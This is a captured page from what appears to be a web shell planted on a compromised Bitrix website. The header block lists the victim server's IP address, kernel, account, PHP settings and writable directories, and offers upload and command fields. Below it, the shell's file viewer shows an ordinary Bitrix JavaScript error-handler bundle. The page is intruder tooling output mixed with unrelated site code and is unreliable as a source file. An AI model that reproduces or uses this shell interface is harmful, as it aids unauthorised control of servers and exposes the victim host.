%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 3.145.47.148
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/js/sender/error_handler/dist/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/js/sender/error_handler/dist/error_handler.bundle.js
this.BX = this.BX || {};
(function (exports,main_core,main_core_events) {
	'use strict';

	function _templateObject() {
	  var data = babelHelpers.taggedTemplateLiteral(["<div class=\"sender-user-error-handler-text\">\n\t\t\t", "\n\t\t\t<br>\n\t\t\t", "\n\t\t\t</div>"]);

	  _templateObject = function _templateObject() {
	    return data;
	  };

	  return data;
	}
	var ErrorHandler =
	/*#__PURE__*/
	function () {
	  function ErrorHandler() {
	    babelHelpers.classCallCheck(this, ErrorHandler);
	  }

	  babelHelpers.createClass(ErrorHandler, [{
	    key: "onError",
	    value: function onError(errorCode, data, callbackSuccess, callbackFailure) {
	      var handlers = this.getHandlers(callbackSuccess, callbackFailure);

	      if (handlers.hasOwnProperty(errorCode) && main_core.Type.isFunction(handlers[errorCode])) {
	        handlers[errorCode].apply(this, [data]);
	      }
	    }
	  }, {
	    key: "getHandlers",
	    value: function getHandlers(callbackSuccess, callbackFailure, extraData) {
	      return {
	        'WRONG_EMAIL_FROM': this.getWrongEmailFromHandler.bind(this, callbackSuccess, callbackFailure, extraData),
	        'FEATURE_NOT_AVAILABLE': this.getFeatureUnavailableHandler.bind(this, callbackSuccess, callbackFailure, extraData),
	        'NEED_ACCEPT_AGREEMENT': this.needAcceptAgreementHandler.bind(this, callbackSuccess, callbackFailure, extraData)
	      };
	    }
	  }, {
	    key: "getWrongEmailFromHandler",
	    value: function getWrongEmailFromHandler(callbackSuccess, callbackFailure, extraData, data) {
	      var _this = this;

	      if (extraData) {
	        Object.assign(data, extraData);
	      }

	      this.oncloseCalbackActive = true;

	      if (!this.wrongEmailFromPopup) {
	        this.wrongEmailFromPopup = BX.PopupWindowManager.create({
	          id: 'sender_user_error_wrongEmailFrom',
	          autoHide: true,
	          lightShadow: true,
	          closeByEsc: true,
	          overlay: {
	            backgroundColor: 'black',
	            opacity: 500
	          },
	          events: {
	            onPopupClose: function onPopupClose() {
	              if (_this.oncloseCalbackActive && main_core.Type.isFunction(callbackFailure)) {
	                callbackFailure(data);
	              }
	            }
	          }
	        });
	      }

	      this.wrongEmailFromPopup.setContent(main_core.Tag.render(_templateObject(), main_core.Loc.getMessage('SENDER_ERROR_HANDLER_WRONG_FROM_EMAIL_TITLE'), main_core.Loc.getMessage('SENDER_ERROR_HANDLER_WRONG_FROM_EMAIL_MESSAGE')));
	      this.wrongEmailFromPopup.setButtons([new BX.UI.Button({
	        text: main_core.Loc.getMessage('SENDER_ERROR_HANDLER_WRONG_FROM_EMAIL_EDIT_EMAIL'),
	        color: BX.UI.Button.Color.SUCCESS,
	        onclick: function onclick() {
	          location.href = data.editUrl;
	          _this.oncloseCalbackActive = false;

	          _this.wrongEmailFromPopup.close();
	        }
	      }), new BX.UI.Button({
	        text: main_core.Loc.getMessage('SENDER_ERROR_HANDLER_WRONG_FROM_EMAIL_CANCEL'),
	        color: BX.UI.Button.Color.LINK,
	        onclick: function onclick() {
	          _this.wrongEmailFromPopup.close();
	        }
	      })]);
	      this.wrongEmailFromPopup.show();
	    }
	  }, {
	    key: "getFeatureUnavailableHandler",
	    value: function getFeatureUnavailableHandler(callbackSuccess, callbackFailure, extraData, data) {
	      if (extraData) {
	        Object.assign(data, extraData);
	      }

	      if (BX.Sender.B24License) {
	        BX.Sender.B24License.showPopup('Ad');
	      }

	      callbackFailure(data);
	    }
	  }, {
	    key: "needAcceptAgreementHandler",
	    value: function needAcceptAgreementHandler(callbackSuccess, callbackFailure, extraData, data) {
	      if (extraData) {
	        Object.assign(data, extraData);
	      }

	      main_core.Runtime.loadExtension('sender_agreement').then(function () {
	        main_core_events.EventEmitter.subscribe('BX.Sender.Agreement:onAccept', function () {
	          callbackSuccess();
	        });
	        BX.Sender.Agreement.isAccepted = false;
	        BX.Sender.Agreement.showPopup();
	      });
	    }
	  }]);
	  return ErrorHandler;
	}();

	exports.ErrorHandler = ErrorHandler;

}((this.BX.Sender = this.BX.Sender || {}),BX,BX.Event));
//# sourceMappingURL=error_handler.bundle.js.map

Youez - 2016 - github.com/yon3zu
LinuXploit